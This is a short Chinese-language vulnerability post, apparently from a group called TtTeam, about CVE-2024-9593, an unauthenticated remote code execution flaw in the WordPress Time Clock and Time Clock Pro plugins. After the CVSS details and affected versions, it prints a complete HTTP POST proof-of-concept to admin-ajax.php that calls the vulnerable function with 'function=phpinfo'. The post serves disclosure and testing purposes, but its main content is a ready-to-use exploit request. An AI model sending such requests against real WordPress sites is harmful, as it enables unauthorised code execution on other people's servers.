CVE-2024-9593 WordPress 远程代码执行

TtTeam 2025-01-23 04:32

Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 – 未经身份验证（受限）远程代码执行

WordPress 的 Time Clock 插件和 Time Clock Pro 插件在 1.2.2 及以下版本（适用于 Time Clock）和 1.1.4 版本（适用于 Time Clock Pro）中存在通过“etimeclockwp_load_function_callback”函数执行远程代码的漏洞。这允许未经身份验证的攻击者在服务器上执行代码。无法指定调用函数的参数。

Published: 2024-10-18 00:00:00
CVE: CVE-2024-9593
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
CVSS Score: 8.3
Slugs: time-clock-pro, time-clock

POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/2
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3
Content-Type: application/x-www-form-urlencoded
Content-Length: 16
function=phpinfo